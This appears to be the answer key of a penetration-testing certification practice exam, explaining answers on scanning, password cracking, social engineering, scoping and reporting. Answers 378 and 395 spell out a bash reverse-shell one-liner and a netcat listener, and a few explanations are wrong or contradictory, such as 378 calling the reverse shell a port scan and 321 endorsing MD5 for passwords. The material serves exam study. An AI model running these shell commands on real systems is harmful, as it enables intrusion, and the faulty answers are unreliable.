1. A. The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.

Answer 286

1. A. Fuzzing occurs when the tester sends random, unexpected information to an application’s inputs to see how it responds. For example, the tester could try to perform a buffer overflow exploit by sending overly large input that contains executable code. If the application doesn’t handle the malicious input properly, it may be possible for executable code to be stored in the RAM of the target system and for the attacker to then be able to execute it.

Answer 287

1. A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician, pretending to be an employee.

Answer 288

1. A. De-confliction refers to the communication between the client and the tester to determine whether the detected attacker is actually part of the physical security assessment. It may sometimes be necessary to create a “get out of jail free” card, which has emergency off-hours phone numbers of higher ranking officers within the company who are aware of the test and can confirm that the tester has the authority to conduct the tests requested.

Answer 289

1. B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive \< NumWeeks \>.

Answer 290

1. A. The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 291

1. B. The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

Answer 292

1. A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 293

1. A. The rcp utility does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the scp command to copy files between servers. The scp utility is part of the SSH suite of utilities, which encrypts authentication information as well as data transfers between systems.

Answer 294

1. D. An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 295

1. A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Answer 296

1. A. The –T5 option causes nmap to scan in *insane* mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.

Answer 297

1. A. Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.

Answer 298

1. C. After a penetration test is complete, it is common for the tester to ask the client to agree (usually in writing) that the tester has fulfilled the contract that was originally signed with the client. This process is called *client acceptance*.

Answer 299

1. A and C. Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Answer 300

1. A and B. Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offline-only attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.

Answer 301

1. B. This is an example of elicitation. By gaining the employees’ trust, the tester was able to elicit sensitive information from them about their employer.

Answer 302

1. B. The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Answer 303

1. A. In a black box penetration test, the tester has no prior knowledge of the target. Therefore, it best simulates what would happen during an attack from the outside. White-box and gray-box penetration tests allow the tester to have some degree of prior knowledge about the target.

Answer 304

1. C and E. The SMB protocol uses TCP ports 139 and 445. A system with these two ports open is most likely a Windows host running SMB or a Linux host running Samba (which is an open source implementation of the SMB service).

Answer 305

1. A. This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.

Answer 306

1. C. Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.

Answer 307

1. A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 308

1. D. SCADA manufacturing equipment tends to be much more fragile than traditional network assets, such as servers and routers. They tend to be difficult to manage, update, and protect from exploits. As such, they can also be susceptible to vulnerability scans and may go offline during the scanning process.

Answer 309

1. B. In a credential harvesting attack, a fake website that looks like a legitimate website is used to capture victims’ usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims’ information.

Answer 310

1. B. After a penetration test, it is critical that you undo everything you have done. For example, if you created any backdoor user accounts, you should make sure you remove those credentials. You should not leave these in place as they could be used by a real attacker to compromise the system later.

Answer 311

1. C. Credential brute forcing is the process of trying one password after another until you finally hit the right one. This may be executed against user accounts or against other security systems, such as a WPA2 wireless network that uses a preshared key.

Answer 312

1. A. The sslyze tool is a penetration testing tool that is commonly used to perform certificate inspection.

Answer 313

1. A. Confidentiality, integrity, and availability is known as the CIA triad. It is a model designed to guide policies for information security within an organization. Cybersecurity professionals use this model to describe the goals of information security. The CIA triad has three main characteristics of information that cybersecurity programs seek to protect: * Confidentiality seeks to prevent unauthorized access to information or systems. * Integrity seeks to prevent unauthorized modification of information or systems. * Availability seeks to ensure that legitimate use of information and systems remains possible.

Answer 314

1. C. The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

Answer 315

1. A. The proper signing authority within the client’s organization is the only one person authorized to agree to the penetration test scope. Who this actually is will vary from organization to organization. Therefore, you need to verify that the person who signs the agreement is actually the appropriate signing authority for the organization. Don’t assume that a given individual is authorized based on their job title alone.

Answer 316

1. A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.

Answer 317

1. C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Answer 318

1. C and E. There are a variety of tools that assist with this OSINT collection: * Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. * Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. * Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. * Nslookup tools help identify the IP addresses associated with an organization. * Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. * Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. * theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. * Whois tools gather information from public records about domain ownership.

Answer 319

1. A. Static code analysis is conducted by analyzing an application’s source code. Obviously, this type of testing is usually performed only during a white box penetration test. Static code analysis does not involve actually running the program. Instead, it is focused on analyzing how the application is written.

Answer 320

1. C. The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a *fast port scan*.

Answer 321

1. A. A company policy, also known as a corporate policy, is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm’s objectives, operations, and plans. It is created by the company’s board of directors. Corporate policy lays down the company’s response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company’s officers in achievement of its objectives. In this scenario, the corporate policy should be detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.

Answer 322

1. D. Whois is a widely used Internet record listing that identifies who owns a domain and how to get in contact with them. The Internet Corporation for Assigned Names and Numbers (ICANN) regulates domain name registration and ownership. Whois records have proven to be extremely helpful and have developed into an essential resource for maintaining the integrity of the domain name registration and website ownership process.

Answer 323

1. A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 324

1. A and D. Organized crime and nation-state threat actors typically have access to extensive financial resources and technical expertise. This many times allows them to develop their own custom exploits that aren’t used by anyone else.

Answer 325

1. C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems.

Answer 326

1. D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Answer 327

1. B. You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a face-to-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.

Answer 328

1. E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.

Answer 329

1. B. The Gramm-Leach-Bliley Act (GLBA) is also known as the Financial Modernization Act of 1999. It is a U.S. federal law that requires financial institutions to explain how they share and protect their customers’ private information.

Answer 330

1. D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

Answer 331

1. A and B. The penetration tester is using two motivation factors in this example. She is using urgency and social proof as motivating factors. Because it is a huge order, the employee probably feels a sense of urgency to comply. The penetration tester also employs social proof by mentioning the name of a familiar co-worker. This probably helps the employee feel more comfortable with giving the penetration tester his username and password.

Answer 332

1. D. The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.

Answer 333

1. D. In a supply chain assessment, a penetration test is conducted on an organization’s vendors to ensure their networks are secure and can’t be used as a pivot point to compromise the organization itself. A goal-based assessment is designed to test a specific aspect of an organization’s security. A premerger test is usually conducted on an organization prior to it merging with another.

Answer 334

1. D. The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

Answer 335

1. B. Nessus is a commercial vulnerability scanning tool used to scan a wide variety of devices and is not part of the tools available for OSINT gathering. There are a variety of tools that assist with this OSINT collection: * Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. * Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Microsoft Office documents, PDFs, and other common file formats. * Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. * Nslookup tools help identify the IP addresses associated with an organization. * Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. * Shodan is a specialized search engine to provide the discovery of vulnerable Internet of Things (IoT) devices from public sources. * theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. * Whois tool gathers information from public records about domain ownership.

Answer 336

1. C. The Health Insurance Portability and Accountability Act of 1996 (HIPPA) is a U.S. legislation that requires data privacy and security provisions for safeguarding medical information. The law has emerged into greater importance recently with the explosion of health data breaches caused by cyberattacks and ransomware attacks on health insurers and providers.

Answer 337

1. A. A black box test is sometimes referred to as a zero knowledge assessment because the penetration testers have little or no knowledge of the client’s network. This type of assessment best emulates a real-world external attack.

Answer 338

1. C. A spear phishing attack was used in this scenario because the malicious email was specifically crafted for a specific employee. A generic phishing attack, on the other hand, would have been sent indiscriminately to a large group of employees within the organization.

Answer 339

1. D. The SAM database on a Windows system contains hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.

Answer 340

1. A. The –sS option causes the nmap utility to conduct a SYN port scan of the specified target system.

Answer 341

1. B. In this example, a downgrade man-in-the-middle attack has occurred because SSL 2.0 is less secure than TLS 1.2. Unless the user is exceptionally vigilant, they will likely not notice that SSL is being used to protect the session instead of TLS.

Answer 342

1. D. In this scenario, the tester has completed one phase of testing and is ready to move onto the next phase. This is called *stages*. During completion of a testing stage, the tester should contact the client and inform them of the completion of one stage and proceed to the next stage of testing.

Answer 343

1. A. Network access control (NAC) systems require network hosts to meet security policy requirements before being allowed to access the network, even if they have properly been connected to a network jack or associated with an access point. Unauthorized or unhealthy devices are usually placed on an isolated remediation network until they are authorized or until they are brought into compliance. After doing so, they are allowed to connect to the actual network segment.

Answer 344

1. D. During a penetration test, a tester may want to configure their scans to run as stealth scans. Stealth scans go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test.

Answer 345

1. B. Lock bypass occurs when an attacker prevents a door’s locking mechanism from working. For example, this could be done by placing tape over the locking tab, as was done in this scenario.

Answer 346

1. D. In a white box test, you should have access to extensive internal documentation. Because an in-house developed application will be used as the attack vector, you should require the client to provide as much documentation about that application as possible. For example, you should ask for architectural diagrams, sample application requests, and the swagger document, as applicable.

Answer 347

1. D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.

Answer 348

1. A. Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.

Answer 349

1. A and C. Using an external team of contractors to perform penetration testing has several drawbacks that should be considered. First, there could be a potential for a conflict of interest if they also perform penetration testing for one of your competitors. Second, they tend to be quite expensive.

Answer 350

1. A and C. After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.

Answer 351

1. A. Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.

Answer 352

1. B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be as follows: * Use multifactor authentication: Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. * Increase minimum password complexity: Complex passwords use different types of characters in unique ways to increase security making it harder for an attacker to crack. * Enable full-disk encryption: Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 353

1. A. The --proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Answer 354

1. A. In this scenario, the penetration tester would need to receive the bands and frequencies used by the client’s wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.

Answer 355

1. A. Among other things, the term *situational awareness* refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.

Answer 356

1. A. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0-6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 3.6 and falls within the Low category.

Answer 357

1. D. A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. A gray box test may provide some information about the environment to the penetration testers without giving full access. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 358

1. B. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.

Answer 359

1. A. The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a high-level view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.

Answer 360

1. E. Because a black box test is being conducted in this scenario, the client’s network should be in “shields up” mode. The penetration testers should not have internal user accounts, nor should their systems be allowed to bypass NAC security controls. Certificate pinning should not be allowed.

Answer 361

1. C. Piggybacking attacks rely on following employees in through secured doors or other entrances. A high-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

Answer 362

1. B. In this scenario, the best option to tell your colleague is that multifactor authentication is using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 363

1. C. In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.

Answer 364

1. A. Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).

Answer 365

1. C and D. When declaring an array, both Ruby and Python use the same syntax: *array\_name* = [*value1, value2, value3, ...*].

Answer 366

1. A and D. In this scenario, the value of compromising a vulnerable domain controller or a database server is much higher than the value of compromising an end user’s vulnerable workstation. For example, compromising a domain controller could expose multiple user accounts. Likewise, compromising a database server could expose valuable company information. On the other hand, the exposure created by a missing Windows feature update is probably minimal. Likewise, Linux provides a relatively high degree of system security, even on an older distribution.

Answer 367

1. B. The Web Application Description Language (WADL) provides an XML-based description of HTTP-based web services running on a web application server. WADL is typically used with Representational State Transfer (REST) web services. WADL is an alternative to WSDL and is generally considered easier to use but also lacks the flexibility associated with WSDL.

Answer 368

1. B. In a black box test, testers are not provided with any access to or information about the target. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.

Answer 369

1. B. A black box penetration test is called for in this scenario, so you will likely spend most of your time in the information gathering and vulnerability identification phase of the assessment. This is because, by definition, you should have little or no knowledge of the organization or its network prior to running the test.

Answer 370

1. D. In this scenario, the client does not have the budget to immediately correct all the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 371

1. A and D. Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Answer 372

1. B. The Representational State Transfer (REST) web application architecture is based on the Hypertext Transfer Protocol (HTTP).

Answer 373

1. D. Red team assessments are typically more targeted than normal penetration tests. The red team acts like an attacker, targeting sensitive data or systems with the goal of acquiring access. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization, and compliance-based assessments are designed to test compliance with specific laws.

Answer 374

1. D. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Answer 375

1. A. Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Answer 376

1. A. In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Answer 377

1. B. Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.

Answer 378

1. A. In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. * Here’s a breakdown of the code: * /bin/bash -i invokes an interactive bash shell. * \> &/dev/tcp// pipes that shell to the tester. * 0&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2\>).

Answer 379

1. A. Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 380

1. B. Hacktivists may want to make a political or social point. Hacktivists aren’t typically doing attacks for money. They are individuals or groups of hackers who get together and see themselves as fighting for injustice. Hacktivists employ the same tools and tactics as hackers.

Answer 381

1. A. In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0–6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 10.0 and falls within the Critical category.

Answer 382

1. A and C. With a list of email addresses of users from the target organization, you could conduct any number of phishing exploits. You could also use the email addresses to enumerate internal user account names. In many (if not most) organizations, the email username is almost always the same as the user’s account name.

Answer 383

1. D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for.

Answer 384

1. C. Because this is a mission-critical server, it may be a good idea to run a test scan in a lab environment before scanning the live system. This will help the tester assess the impact the scan will have before running it on the live system.

Answer 385

1. B and E. Mobile devices represent a significant security weakness in modern networks. Among the many issues associated with mobile devices, two that a penetration tester should be aware of the fact that they tend to be updated in an inconsistent manner. This is less of an issue with Apple devices because they have control of the hardware and software. However, this is a significant issue with Android devices. If you were to check the update level of a group of Android devices, you would likely not find two that are the same. In addition, some users root or jailbreak their devices so they can install apps outside of the approved store channels. This makes these devices susceptible to malware.

Answer 386

1. B. An ARP spoofing attack is classified as a man-in-the-middle attack.

Answer 387

1. A and B. Dumpster diving is a technique used to gather information about a target organization by reviewing documents found in its trash. Likewise, theHarvester can be used to search the Internet to find email addresses and employee names. This information can be used to craft an effective spear phishing campaign.

Answer 388

1. C and D. Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of PowerShell scripts that can be used to conduct a variety of exploits.

Answer 389

1. A. Many penetration testing tools may be covered by export restrictions. The United States prohibits the export of some types of software and hardware, including encryption tools. If you are traveling abroad with your penetration testing toolkit, you could be arrested if you have prohibited software or hardware in your possession.

Answer 390

1. A. The \> relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Answer 391

1. A. Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Answer 392

1. B and E. As an employee of a security firm, you will likely to be asked by your employer to sign a nondisclosure agreement (NDA) and a noncompete agreement. The NDA specifies what each party in an agreement is allowed to disclose to third parties. Your employer likely doesn’t want you to reveal proprietary information to its competitors. The noncompete agreement requires you to agree to not work for a competitor or directly compete with your employer in a future job.

Answer 393

1. A. Among other things, the term *situational awareness* refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.

Answer 394

1. A. The –T1 option tells nmap to scan in *sneaky* mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

Answer 395

1. A. You will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, you are telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 396

1. A and C. You can use either tcpdump or Wireshark to capture packets on a wired network. Of the two, Wireshark is usually considered to have the most user-friendly interface.

Answer 397

1. A. The –oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Answer 398

1. A and C. The Server Message Block (SMB) protocol is used to share files and printers between hosts on a network.

Answer 399

1. B and E. The scope of this engagement in this scenario is limited to the internal network infrastructure. The organization’s ISP, Amazon Web Services, and their neighbor’s wireless networks are all owned by third parties and are therefore considered out of scope.

Answer 400

1. A. *Goal reprioritization* occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.

Answer 401

1. C. A scope creep occurs when additional items are added to the scope of an assessment. The tester has gone beyond the scope of the initial assessment agreement.

Answer 402

1. B. Requiring IT staff members to pass a network security certification exam is an example of a people-based mitigation strategy.

Answer 403

1. A. In this example, the line that reads “250 2.1.5 Recipient OK” indicates that this is a valid email address within the target organization’s domain. However, it does not reveal who the address belongs to. All you know is that it is a legitimate email. To use it in the penetration test, you would first need to triangulate it against a list of company executives, such as is sometimes found on an organization’s website.

Answer 404

1. A. In this scenario, you could recommend that the application be rewritten such that all user inputs are sanitized before being submitted to the backend database. For example, suppose the application contains a field where users are supposed to enter their phone number. The programmers could validate that the information entered contains only numbers (and only the correct number for a phone number). This prevents malicious attackers from submitting SQL statements into these fields that could potentially expose the information in the database.

Answer 405

1. A. The Common Attack Pattern Enumeration and Classification (CAPEC) list is a resource intended to help identify and document attacks and attack patterns. Users are allowed to search attacks by their mechanism or domain and then break down each attack by various attributes and prerequisites. CAPEC also suggests solutions and mitigations, which is useful in identifying controls when writing a penetration test report.

Answer 406

1. A. By flooding the server with half-open TCP connections that never get completed, the tester makes it such that it doesn’t have enough resources to service legitimate network requests. Because only one host was used to conduct the stress test, this is an example of standard denial-of-service (DoS) attack.

Answer 407

1. B. The term *de-escalation* refers to the process of communication between the client and the tester to stop any exploitation being used during the penetration test because of the effects they may be having on the client’s network. In this scenario, the client was losing sales because of the website issues, so the testing needed to be stopped.

Answer 408

1. A. An attestation of findings is a document provided by the penetration testers to document that they conducted a test and the results for compliance purposes. It serves as record of the tester performing the penetration test. It includes a summary of the findings. Its intent is for external use, outside of your client’s organization, to show proof that a penetration test was performed and to highlight the test results.

Answer 409

1. C. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user’s browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.

Answer 410

1. C. The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

Answer 411

1. D. The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

Answer 412

1. D. Because a white box assessment provides the penetration testers with extensive information about the target, it usually provides the most thorough assessment and typically requires the least amount of time to conduct. A gray box test is a blend of black box and white box testing. As such, it takes longer to conduct because more information must be discovered by the testers. In a black box test, the testers are not provided with access to or information about the target environment, which makes the assessment much less complete and takes much longer to conduct. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 413

1. D. The National Vulnerability Database (NVD) website provides a summary of current security vulnerabilities ranked by their severity.

Answer 414

1. B. By scheduling the scan to run during a time of day when few people are at work, you can minimize the impact on available network bandwidth for production traffic, and you can also avoid being seen by internal network administrators.

Answer 415

1. B and C. The whois tool can be used to gather information about domain ownership from public records. The recon-ng utility is a modular web reconnaissance framework that organizes and manages OSINT information.

Answer 416

1. B. Computer Emergency Response Team (CERT) focuses on security breach and denial of service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.

Answer 417

1. C. The penetration tester is using authority (and probably urgency along with fear) as a motivating factor. The sales rep may be inclined to create the VPN connection to prevent the supposed loss of an important client.

Answer 418

